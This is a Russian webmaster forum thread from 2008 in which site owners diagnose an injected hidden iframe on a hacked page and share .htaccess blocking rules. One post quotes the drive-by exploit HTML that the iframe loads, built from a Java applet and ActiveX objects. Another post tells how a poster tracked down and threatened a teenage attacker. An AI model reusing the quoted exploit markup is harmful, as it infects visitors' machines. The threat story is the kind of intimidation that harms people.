worldtraffic.trade
С нами с 20.08.06
Сообщения: 2836
Рейтинг: 2309
|
 Добавлено: 01/06/08 в 18:10 |
проверяйтесь 
защищен был по всем методам которые предлагались тут
ну и вот собственно код который появился на маин паге
| Цитата: | | scr--ipt scr--ipt |
может кто расшифрует что там в нутри куда ведет, надо банить этого пидара заебал уже
p.s. простите за французкий
Последний раз редактировалось: WorldTraffic (01/06/08 в 21:16), всего редактировалось 2 раз(а)
|
|
|
|
| |
worldtraffic.trade
С нами с 20.08.06
Сообщения: 2836
Рейтинг: 2309
|
| Добавлено: 01/06/08 в 18:16 |
особенности взлома, единственный запрос IP (ukraine) tried to login with login / . был с моего IP
в корне уже нету файла sync и как там второй немогу вспомнить, кароче с нулевым размером нету таких
темплейт изменил вроде нормал все но вирус всеравно появляется, может когда расшифрует кто то будет понятно откуда он туда ложиться
|
|
|
|
| |
С нами с 23.06.07
Сообщения: 27
Рейтинг: 23
|
| Добавлено: 01/06/08 в 19:00 |
| Код: |
<iframe src="xttp://www.dfucking-asians.com/images/z/static.php?sig=777573287F657E62743F737761376F7B580C474945" height="2" style="display:none" width="2"></iframe>
|
По указанному урлу код:
| Код: |
<applet code=animan.class name=maniman height=1 width=1 MAYSCRIPT></applet><applet archive=OP.jar code=OP.class width=1 height=1 MAYSCRIPT><param name=usid value=us0105><param name=linkurl value="http://www.dfucking-asians.com/images/z/ex.php"></applet><OBJECT id="hhctrl_HTML_Opener" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" style="display:none"> <PARAM name="Command" value="Related Topics, MENU"><PARAM name="Button" value="Text:Just a button"><PARAM name="Window" value="$global_blank"><PARAM name="Item1" value="command;ms-its:addremov.chm::/win_addprog_window_component.htm"></OBJECT><textarea id="ObjMaker" cols=10 rows=10 style="display:none"><OBJECT id="hhctrl_JS_Runner" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" style="display:none"><PARAM name="Command" value="Related Topics, MENU"><PARAM name="Button" value="Text:Just a button"><PARAM name="Window" value="$global_blank"></textarea><OBJECT id="DHTML_Edit" classid="clsid:2D360201-FFF5-11d1-8D03-00A0C959BC0A" width=10 height=10 align="middle"><PARAM NAME="ActivateApplets" VALUE="1"><PARAM NAME="ActivateActiveXControls" VALUE="1"></OBJECT> <DIV id="ObjectContainer"></DIV>
|
Что он делает - ХЗ.
|
|
|
|
| |
С нами с 04.03.07
Сообщения: 8929
Рейтинг: 5138
|
| Добавлено: 01/06/08 в 20:46 |
|
|
|
|
| |
С нами с 12.12.06
Сообщения: 871
Рейтинг: 381
|
| Добавлено: 02/06/08 в 00:03 |
вот пидорасы хакеры работать нармально не дают  я так понял AT ломанули, ну продают они столько копий, думаю что не бедные, а такое чувство что пишет его студент. Тестеров пустить на мыло!
Топикстартеру сочувствую!
|
|
|
|
| |
С нами с 07.10.04
Сообщения: 300
Рейтинг: 95
|
| Добавлено: 02/06/08 в 00:58 |
Меня один раз ломанули, но не через сайт а через мой ПК, пока еще молодой был и ИЕ юзал. Чел засадил аналогичный код, на все мои сайты на тот момент, их было штук 20, и упёр асю.
Что бы вы думали, просидел ночь, расшифрил код, нашел домен куда ведет код, нашел форум на юмаксе пидераста который этот домен там пытался продать, по его нику нашел его асю, 2ю асю, по ним нашел объявы из соседнего города электросталь с его мобильным домашним и с адресом.
И в 9 утра позвонил ему )))
Чел был в шоке, 15 летний хрен, как выяснилось имел и белые блоги рашн, писал там умные статьи вроде о безопасности и т.д.
Вообщем в 9 утра я ему в кратце объяснил где в его городе я буду его ждать что бы познакомиться поближе, и попросил убрать всю херь с доменов.
Благо чел в тот же вечер что забрал асю, мне её вернул просто на халяву, мотивировав это тем что мол русских не обижаю.
И благо в 9 утра понял что лучше всё поправить, рассказал мне как и что удалить, убрал меня из своей базы и т.д.
Вообщем ТС гугл тебе в руки, и ищи где доменчик палился, на который ведёт ссылка, может свезеш выловиш своего 15 летнего хренакера )
|
|
|
|
| |
(.)(.) Сиськеее...
С нами с 20.05.03
Сообщения: 2598
Рейтинг: 2651
|
| Добавлено: 02/06/08 в 09:46 |
ТС, вот скажи, не надоело мазохизмом заниматься?
Меняешь скрипт и спишь спокойно...
Ведь, даже если посмотреть на историю апдейтов атл - это смех сквозь слезы...
Прально тут сказали:
| Цитата: | | а такое чувство что пишет его студент |
|
|
|
|
| |
worldtraffic.trade
С нами с 20.08.06
Сообщения: 2836
Рейтинг: 2309
|
| Добавлено: 02/06/08 в 11:44 |
|
|
|
|
| |
😈😈😈
С нами с 17.08.05
Сообщения: 3966
Рейтинг: 5534
|
| Добавлено: 02/06/08 в 12:04 |
не тупите , dfucking-asians точно так же поломан , как и топикстартер . каждый сломанный домен юзается в качестве гейта для следующих зараженных . заебешься вычислять в общем %(
|
|
|
|
Diablo.Click - T1 ским трафик напрямую с тубов от 0.5$ за кил
|
0
|
|
| |
worldtraffic.trade
С нами с 20.08.06
Сообщения: 2836
Рейтинг: 2309
|
| Добавлено: 02/06/08 в 12:26 |
| Diablo II писал: | | не тупите , dfucking-asians точно так же поломан , как и топикстартер . каждый сломанный домен юзается в качестве гейта для следующих зараженных . заебешься вычислять в общем %( |
как ты определил что он поломан?
|
|
|
|
| |
С нами с 06.10.06
Сообщения: 964
Рейтинг: 742
|
| Добавлено: 02/06/08 в 12:56 |
| world-gay-sex писал: |
защищен был по всем методам которые предлагались тут
|
Скорее всего рефом бахнули..
У тебя был токо так закрыт ??
RewriteEngine on
RewriteCond %{HTTP_REFERER} ^(.*)?document.write\(unescape(.*)?$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(.*)?<\?(.*)?$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(.*)?\?>(.*)?$ [NC]
RewriteRule .* http://google.com/ [L]
ну и cgi там разные
я начинаю думать что этого мало...
|
|
|
|
| |
😈😈😈
С нами с 17.08.05
Сообщения: 3966
Рейтинг: 5534
|
| Добавлено: 02/06/08 в 13:04 |
| world-gay-sex писал: | | как ты определил что он поломан? |
100%
можешь глянуть топики по этой трабле даже тут на мастере ,
слоника так же обвиняли %) с его ебони-факиннг.нет грузилось гумно .
|
|
|
|
Diablo.Click - T1 ским трафик напрямую с тубов от 0.5$ за кил
|
0
|
|
| |
worldtraffic.trade
С нами с 20.08.06
Сообщения: 2836
Рейтинг: 2309
|
| Добавлено: 02/06/08 в 13:25 |
| adminZ писал: | Скорее всего рефом бахнули..
У тебя был токо так закрыт ??
RewriteEngine on
RewriteCond %{HTTP_REFERER} ^(.*)?document.write\(unescape(.*)?$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(.*)?<\?(.*)?$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(.*)?\?>(.*)?$ [NC]
RewriteRule .* http://google.com/ [L]
ну и cgi там разные
я начинаю думать что этого мало... |
у меня было вот так
RewriteEngine on
RewriteCond %{HTTP_REFERER} ^(.*)?document.write\(unescape(.*)?$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(.*)?<\?(.*)?$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(.*)?\?>(.*)?$ [NC,OR]
RewriteCond %{QUERY_STRING} ^(.*)?document.write\(unescape(.*)?$ [NC]
RewriteRule .* http://google.com/ [L]
+
в папках ATX блокировки по IP на файлы которые ломали
|
|
|
|
| |
С нами с 07.10.04
Сообщения: 300
Рейтинг: 95
|
| Добавлено: 02/06/08 в 13:27 |
у меня значит проще ситуёвина была...
Ищите во всём worlde а найдёте, у страивайте парню gay sex
|
|
|
|
| |
worldtraffic.trade
С нами с 20.08.06
Сообщения: 2836
Рейтинг: 2309
|
| Добавлено: 02/06/08 в 13:57 |
| Diablo II писал: | 100%
можешь глянуть топики по этой трабле даже тут на мастере ,
слоника так же обвиняли %) с его ебони-факиннг.нет грузилось гумно . |
если чела поломали, возможно кто то из трейдеров прочитав топик стукнет к нему скажет и он все почистит а может еще и инфу какую надыбает тем самым поможет найти уродца
а если он сам уродец то тогда ему место в уродах
|
|
|
|
| |
С нами с 10.10.07
Сообщения: 339
Рейтинг: 404
|
| Добавлено: 02/06/08 в 15:21 |
| world-gay-sex писал: | проверяйтесь
защищен был по всем методам которые предлагались тут
|
| Цитата: |
особенности взлома, единственный запрос IP (ukraine) tried to login with login / . был с моего IP
|
только судя по этому понятно что нифга ты небыл защищён - пускало со всех айпишников в админку (не прикрыт admin.cgi хтаксесом) - вот он тебе говно и воткнул в sec.log.
|
|
|
|
| |
worldtraffic.trade
С нами с 20.08.06
Сообщения: 2836
Рейтинг: 2309
|
| Добавлено: 02/06/08 в 17:36 |
| Soft-Com писал: | | только судя по этому понятно что нифга ты небыл защищён - пускало со всех айпишников в админку (не прикрыт admin.cgi хтаксесом) - вот он тебе говно и воткнул в sec.log. |
т.е. по твоему надо было намертво закрыть что бы даже я не мог зайти?
не понял я твоего поста
p.s. вот с таким содержанием лежит хетаксес в папке atx
<Files admin.cgi>
Order Deny,Allow
Deny from all
Allow from мой IP
Allow from мой IP
</Files>
<Files x2.cgi>
Order Deny,Allow
Deny from all
Allow from мой IP
Allow from мой IP
</Files>
|
|
|
|
| |
С нами с 10.10.07
Сообщения: 339
Рейтинг: 404
|
| Добавлено: 02/06/08 в 18:04 |
оч странно ...
запись в sec.log которую ты скинул может появится только при прямом обращении к admin.cgi
есть логи апача по этому домену?
|
|
|
|
| |
С нами с 06.11.06
Сообщения: 544
Рейтинг: 166
|
| Добавлено: 02/06/08 в 18:18 |
at3/atx? Слеза наворачивается, когда вижу такие топики. Меняйте скрипт - возможно временное, но решение проблемы.
|
|
|
|
In the end, It doesn't even matter.
|
0
|
|
| |
worldtraffic.trade
С нами с 20.08.06
Сообщения: 2836
Рейтинг: 2309
|
| Добавлено: 02/06/08 в 20:47 |
у кого стоит ST проверьте его file check запустите, кароче в папку тумбы в подпапки понапихивал php файлов со своими чудо кодами
+
нашол в папках к которым уже 2 года не обращался папку extractor в ней куча всего и там вирусы
|
|
|
|
| |
